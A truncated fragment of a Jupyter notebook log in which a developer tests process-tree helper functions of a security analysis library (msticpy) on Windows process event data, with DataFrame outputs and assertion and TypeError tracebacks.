\nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x15c8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004/5 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \n\n[12 rows x 35 columns]" }, "execution_count": 51, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_siblings(p_tree, children.iloc[0])" }, "executionTime": "2019-12-13T21:02:32.577Z" }, { "cell": { "executionCount": 52, "executionEventId": "28c27720-6005-4910-b92e-db32aedb61e7", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "13" }, "execution_count": 52, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_siblings(p_tree, children.iloc[0])\nlen(children)" }, "executionTime": "2019-12-13T21:02:47.381Z" }, { "cell": { "executionCount": 53, "executionEventId": "d77b1d3c-b7b3-463f-9791-ae8869983094", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "False" }, "execution_count": 53, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "\nlen(children) == len(ptutil.get_siblings(p_tree, children.iloc[0], include_source=True))" }, "executionTime": "2019-12-13T21:03:19.834Z" }, { "cell": { "executionCount": 54, "executionEventId": "c84291cf-0a56-48d6-806d-9ae0619bd7e6", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "12" }, "execution_count": 54, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "len(ptutil.get_siblings(p_tree, children.iloc[0], include_source=True))" }, "executionTime": "2019-12-13T21:03:35.556Z" }, { "cell": { "executionCount": 55, "executionEventId": "d5928f27-f0a7-4965-a8b7-787458dbfa69", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "True" }, "execution_count": 55, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "children2 = ptutil.get_children(p_tree, t_root, include_source=False)\nlen(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))" }, "executionTime": "2019-12-13T21:04:29.396Z" }, { "cell": { "executionCount": 56, "executionEventId": "44bf1d02-7734-47a3-9e3a-e93aac4e1151", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 16\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 17\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 18\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 19\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdropna\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdropna\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 20\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc) == t_root).all()\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:05:48.872Z" }, { "cell": { "executionCount": 57, "executionEventId": "6eb3074b-ea9e-44a4-bd0e-73c7242e064f", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m 24\u001b[0m \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:06:13.458Z" }, { "cell": { "executionCount": 58, "executionEventId": "ec24dbec-5184-4865-a87d-34565a57de04", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "12" }, "execution_count": 58, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "len(children2)" }, "executionTime": "2019-12-13T21:06:28.533Z" }, { "cell": { "executionCount": 59, "executionEventId": "99ef027f-a356-46ea-aa83-5410dd92ab9c", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m 24\u001b[0m \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m 770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 771\u001b[0m \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 773\u001b[0m \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 774\u001b[0m \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1539\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1540\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1542\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1543\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:06:34.554Z" }, { "cell": { "executionCount": 60, "executionEventId": "c3953220-a1de-418b-acc9-ba1fa355f5f7", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 20\u001b[0m \u001b[0mchildren2\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 21\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m 